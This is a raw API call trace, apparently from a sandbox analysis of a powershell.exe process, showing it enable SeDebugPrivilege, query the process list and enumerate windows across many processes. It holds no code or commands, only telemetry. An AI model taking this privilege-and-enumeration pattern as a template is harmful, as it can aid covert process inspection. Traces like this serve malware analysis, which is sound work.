	[0802.569] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\", lplpBuffer=0x18ddc8, puLen=0x18ddc0 | out: lplpBuffer=0x18ddc8*=0x2bb7300, puLen=0x18ddc0) returned 1
	[0802.574] GetCurrentProcessId () returned 0x1430
	[0808.707] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18ccf0 | out: lpLuid=0x18ccf0*(LowPart=0x14, HighPart=0)) returned 1
	[0808.710] GetCurrentProcess () returned 0xffffffffffffffff
	[0808.711] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18cd10 | out: TokenHandle=0x18cd10*=0x2d0) returned 1
	[0808.712] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2bbab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0809.841] CloseHandle (hObject=0x2d0) returned 1
	[0812.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1430) returned 0x2d0
	[0812.373] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2bbabb8, cb=0x200, lpcbNeeded=0x18dd28 | out: lphModule=0x2bbabb8, lpcbNeeded=0x18dd28) returned 1
	[0812.375] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2bbae28, cb=0x18 | out: lpmodinfo=0x2bbae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0812.376] CoTaskMemAlloc (cb=0x804) returned 0x2bebb0
	[0812.377] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x2bebb0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0812.377] CoTaskMemFree (pv=0x2bebb0) 
	[0812.378] CoTaskMemAlloc (cb=0x804) returned 0x2bebb0
	[0812.378] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x2bebb0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0812.378] CoTaskMemFree (pv=0x2bebb0) 
	[0812.379] CloseHandle (hObject=0x2d0) returned 1
	[0813.894] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1430) returned 0x2d0
	[0813.895] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x18de58 | out: lpExitCode=0x18de58*=0x103) returned 1
	[0813.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bbb088, Length=0x20000, ResultLength=0x18de20 | out: SystemInformation=0x12bbb088, ResultLength=0x18de20*=0x437a8) returned 0xc0000004
	[0813.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bdb0b8, Length=0x45fa8, ResultLength=0x18de20 | out: SystemInformation=0x12bdb0b8, ResultLength=0x18de20*=0x437a8) returned 0x0
	[0815.264] EnumWindows (lpEnumFunc=0x29166ac, lParam=0x0) returned 1
	[0817.116] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.116] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x558
	[0817.116] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.116] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.116] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x538
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x778
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x778
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.117] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x460
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4d0
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1f18
	[0817.118] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x20a8
	[0817.119] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x2004
	[0817.119] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1f88
	[0817.119] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1f84
	[0817.119] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x2050
	[0817.119] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e04
	[0817.122] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ecc
	[0817.122] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e64
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b58
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e94
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1e28
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1df8
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1da8
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1c70
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x163c
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1a10
	[0817.123] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x186c
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1d74
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4c8
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1960
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ce4
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b24
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x14e0
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x17f0
	[0817.124] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x854
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1268
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1624
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b9c
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16f4
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x145c
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x17d0
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1d28
	[0817.125] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xcb8
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1190
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x3a8
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1bd0
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1bfc
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1a78
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b90
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b04
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b34
	[0817.126] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1b64
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1bb0
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1acc
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1a2c
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x19a8
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1944
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x18c8
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x18ac
	[0817.127] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x18ec
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1898
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc98
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x153c
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1808
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12a4
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1740
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16c4
	[0817.128] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1820
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16ac
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1858
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1664
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10b4
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10ac
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10ec
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1068
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x17e0
	[0817.129] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x102c
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x17a4
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1050
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1694
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1770
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1720
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x165c
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1578
	[0817.130] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x16c0
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x161c
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1638
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x15c8
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1554
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1674
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1520
	[0817.131] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x14bc
	[0817.132] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf8c
	[0817.132] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe9c
	[0817.132] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1434
	[0817.133] GetWindow (hWnd=0x1065e, uCmd=0x4) returned 0x0
	[0817.133] IsWindowVisible (hWnd=0x1065e) returned 0
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x14ec
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfcc
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12ac
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1484
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x934
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc0c
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb08
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x948
	[0817.134] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1178
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x13e0
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xcd0
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x13fc
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xdc8
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc18
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc2c
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa1c
	[0817.135] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1244
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xdb0
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1398
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1358
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1370
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1340
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x130c
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12c0
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x12e4
	[0817.136] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1270
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1298
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x120c
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x122c
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x11c4
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x11b0
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1188
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1148
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1160
	[0817.137] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x10fc
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe34
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xea4
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x514
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe48
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xbc8
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xdf8
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x318
	[0817.138] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xcac
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x8bc
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf9c
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf48
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe40
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xecc
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xeb8
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe80
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe98
	[0817.139] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe60
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xee4
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf00
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xdf0
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe1c
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xdd0
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd94
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd74
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd00
	[0817.140] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xcd8
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc84
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xca4
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc64
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc24
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb84
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xbac
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x384
	[0817.141] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xab8
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x33c
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa44
	[0817.142] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa64
